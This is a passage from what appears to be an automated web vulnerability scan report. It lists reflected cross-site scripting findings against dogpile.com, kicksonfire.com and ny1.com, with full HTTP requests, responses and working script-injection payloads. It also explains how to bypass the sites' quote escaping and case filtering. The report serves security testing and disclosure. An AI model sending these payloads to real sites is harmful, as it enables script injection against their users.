var callback_server_url = 'http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1?0=&1=0&4=173.193.214.243&5=173.193.214.243&9=3bbca414522d42f7bc54c16a3af0cb01&10=1&11=info.dogpl.other&1
...[SNIP]...

2.93. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11 [icePage%24SearchBoxTop%24qcat parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/redir/_iceUrlFlag=11

Issue detail

The value of the icePage%24SearchBoxTop%24qcat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d72e6\'%3b75d0d1bef7c was submitted in the icePage%24SearchBoxTop%24qcat parameter. This input was echoed as d72e6\\';75d0d1bef7c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /dogpile_other/ws/redir/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11?_IceUrl=true
Content-Length: 2186
Cache-Control: max-age=0
Origin: http://www.dogpile.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:12 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=fabc047e90564b3caea8c16a3af0cb01&CookieDomain=.dogpile.com

__VIEWSTATE=%2FwEPDwULLTEwNzYxNjAxNjBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYGBR5pY2VQYWdlJFNlYXJjaEJveFRvcCRxa3dzdWJtaXQFLmljZVBhZ2UkU2VhcmNoQm94VG9wJEFkdmFuY2VkU2VhcmNoV2ViJGluY2x1ZGUFLmljZV
...[SNIP]...
iifX%2BBAKw%2FZDRAQIteqHnA3ZhIp9VQNtHLGXL2pUo&icePage%24SearchBoxTop%24qkw=site%3Axss.cx&icePage%24SearchBoxTop%24qkwsubmit.x=0&icePage%24SearchBoxTop%24qkwsubmit.y=0&icePage%24SearchBoxTop%24qcat=Webd72e6\'%3b75d0d1bef7c&icePage%24SearchBoxTop%24rfcid=417&icePage%24SearchBoxTop%24rfcp=&icePage%24SearchBoxTop%24qlnk=0&icePage%24SearchBoxTop%24AdvancedSearchWeb%24advnames=qall%2Cqphrase%2Cqany%2Cqnot%2Clang%2Cqafter%2C
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=a63d211eee26414d9dd7c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:58 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:58 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:58 GMT; path=/
Set-Cookie: wsTemp=bigIP+3775436042.20480.0000+cacheId+ms19:1301677091189; path=/
Set-Cookie: wsRecent=site%3axss.cx,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:58 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 64952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
, more";
var addthis_offset_top = 20;
var addthis_hover_delay = 0;
var addthis_append_data = true;
var addthis_share_url = 'http://www.dogpile.com/info.dogpl.rss/Webd72e6\\';75d0d1bef7c/site%3axss.cx';
var callback_server_url = 'http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1?0=&1=0&4=173.193.214.243&5=173.193.214.243&9=a63d211eee26414d9dd7c16a3af0cb01&10=1&11=info.
...[SNIP]...

2.94. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11 [qcat parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/redir/_iceUrlFlag=11

Issue detail

The value of the qcat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc191</ScRiPt%20>b4d651e87b1 was submitted in the qcat parameter. This input was echoed as dc191</ScRiPt >b4d651e87b1 in the application's response.

This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /dogpile_other/ws/redir/_iceUrlFlag=11?_IceUrl=true&qcat=dc191</ScRiPt%20>b4d651e87b1 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=88a9cb4e452045dfbbd8c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:37 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:37 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:37 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:37 GMT
Connection: close
Content-Length: 45962
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
pon, more";
var addthis_offset_top = 20;
var addthis_hover_delay = 0;
var addthis_append_data = true;
var addthis_share_url = 'http://www.dogpile.com/info.dogpl.rss/Dc191</Script >B4d651e87b1/';
var callback_server_url = 'http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1?0=&1=0&4=173.193.214.243&5=173.193.214.243&9=88a9cb4e452045dfbbd8c16a3af0cb01&10=1&11=info.dogpl.other&1
...[SNIP]...

2.95. http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11 [qcat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_rss/ws/redir/_iceUrlFlag=11

Issue detail

The value of the qcat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdc14</script><script>alert(1)</script>bc3b9419cd was submitted in the qcat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /dogpile_rss/ws/redir/_iceUrlFlag=11?_IceUrl=true&qcat=bdc14</script><script>alert(1)</script>bc3b9419cd HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=c64a3d65c7ff4b7dbcdfc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:09 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:09 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:09 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:08 GMT
Connection: close
Content-Length: 45875
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
pon, more";
var addthis_offset_top = 20;
var addthis_hover_delay = 0;
var addthis_append_data = true;
var addthis_share_url = 'http://www.dogpile.com/info.dogpl.rss/Bdc14</Script><Script>Alert(1)</Script>Bc3b9419cd/';
var callback_server_url = 'http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1?0=&1=0&4=173.193.214.243&5=173.193.214.243&9=c64a3d65c7ff4b7dbcdfc16a3af0cb01&10=1&11=info.dogpl.rss&14=
...[SNIP]...

2.96. http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11 [qcat parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_rss/ws/redir/_iceUrlFlag=11

Issue detail

The value of the qcat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d46d\'%3b6b7e482d682 was submitted in the qcat parameter. This input was echoed as 1d46d\\';6b7e482d682 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /dogpile_rss/ws/redir/_iceUrlFlag=11?qcat=1d46d\'%3b6b7e482d682&qkw=Go%20Daddy%20CEO%20Elephant&qcoll=relevance&zoom=off&bepersistence=true&newtxn=false&qi=21&qk=20&page=2&_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=a7dbe50ac6c642a88691c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:25 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:25 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:25 GMT; path=/
Set-Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; path=/
Set-Cookie: wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:25 GMT
Connection: close
Content-Length: 103613
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
pon, more";
var addthis_offset_top = 20;
var addthis_hover_delay = 0;
var addthis_append_data = true;
var addthis_share_url = 'http://www.dogpile.com/info.dogpl.rss/1d46d\\';6b7e482d682/Go+Daddy+CEO+Elephant';
var callback_server_url = 'http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1?0=&1=0&4=173.193.214.243&5=173.193.214.243&9=a7dbe50ac6c642a88691c16a3af0cb01&10=1&
...[SNIP]...

2.97. http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11 [qcat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_rss/ws/redir/_iceUrlFlag=11

Issue detail

The value of the qcat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c5ea\'%3balert(1)//e445c104ee1 was submitted in the qcat parameter. This input was echoed as 6c5ea\\';alert(1)//e445c104ee1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /dogpile_rss/ws/redir/_iceUrlFlag=11?rfcp=TopNavigation&rfcid=407&qcat=Web6c5ea\'%3balert(1)//e445c104ee1&qkw=MLB%20Schedule&newtxn=false&qcoll=Relevance&_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=fe86ba7b839e447e97c1c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:34 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:34 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:34 GMT; path=/
Set-Cookie: wsTemp=bigIP+3725104394.20480.0000+cacheId+ms16:1301677190970; path=/
Set-Cookie: wsRecent=MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:34 GMT
Connection: close
Content-Length: 145639
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
, more";
var addthis_offset_top = 20;
var addthis_hover_delay = 0;
var addthis_append_data = true;
var addthis_share_url = 'http://www.dogpile.com/info.dogpl.rss/Web6c5ea\\';Alert(1)//E445c104ee1/MLB+Schedule';
var callback_server_url = 'http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1?0=&1=0&4=173.193.214.243&5=173.193.214.243&9=fe86ba7b839e447e97c1c16a3af0cb01&10=1&11=info.d
...[SNIP]...

2.98. http://www.kicksonfire.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kicksonfire.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4dbf7</script><script>alert(1)</script>4eeb72bba5c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4dbf7</script><script>alert(1)</script>4eeb72bba5c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kicksonfire.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 01 Apr 2011 16:21:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Pingback: http://www.kicksonfire.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.4b
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 16:21:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 21954


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org
...[SNIP]...
<script>
COMSCORE.beacon({
c1:2,
c2:6685975,
c3:"",
c4:"www.kicksonfire.com/favicon.ico4dbf7</script><script>alert(1)</script>4eeb72bba5c",
c5:"",
c6:"",
c15:""
});
</script>
...[SNIP]...

2.99. http://www.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ny1.com
Path:   /App_Skins/news1/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb45a'%3b3be91b1fed6 was submitted in the REST URL parameter 1. This input was echoed as cb45a';3be91b1fed6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /App_Skinscb45a'%3b3be91b1fed6/news1/favicon.ico HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:10:53 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56055
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:20:57 GMT
Date: Fri, 01 Apr 2011 18:10:57 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?404;http://www.ny1.com:80/App_Skinscb45a';3be91b1fed6/news1/favicon.ico'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.100. http://www.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ny1.com
Path:   /App_Skins/news1/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9307'%3b60ed35259b0 was submitted in the REST URL parameter 2. This input was echoed as b9307';60ed35259b0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /App_Skins/news1b9307'%3b60ed35259b0/favicon.ico HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:04 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56061
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:21:09 GMT
Date: Fri, 01 Apr 2011 18:11:09 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?404;http://www.ny1.com:80/App_Skins/news1b9307';60ed35259b0/favicon.ico'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.101. http://www.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ny1.com
Path:   /App_Skins/news1/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90922'%3b84586baa9ee was submitted in the REST URL parameter 3. This input was echoed as 90922';84586baa9ee in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /App_Skins/news1/favicon.ico90922'%3b84586baa9ee HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:15 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56154
Vary: Accept-Encoding
Cache-Control: public, max-age=594
Expires: Fri, 01 Apr 2011 18:21:10 GMT
Date: Fri, 01 Apr 2011 18:11:16 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/App_Skins/news1/favicon.ico90922';84586baa9ee/default.aspx'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.102. http://www.ny1.com/Content/ServeContent.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ny1.com
Path:   /Content/ServeContent.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 741cc'%3b7ff253c1040 was submitted in the REST URL parameter 1. This input was echoed as 741cc';7ff253c1040 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Content741cc'%3b7ff253c1040/ServeContent.aspx?id=694&ticks=810228 HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:10:30 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56103
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:20:35 GMT
Date: Fri, 01 Apr 2011 18:10:35 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/Content741cc';7ff253c1040/ServeContent.aspx'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.103. http://www.ny1.com/Content/ServeContent.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ny1.com
Path:   /Content/ServeContent.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f48c2'%3b6f5ee646a27 was submitted in the REST URL parameter 2. This input was echoed as f48c2';6f5ee646a27 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Content/ServeContent.aspxf48c2'%3b6f5ee646a27?id=694&ticks=810228 HTTP/1.1
Host: www.ny1.com
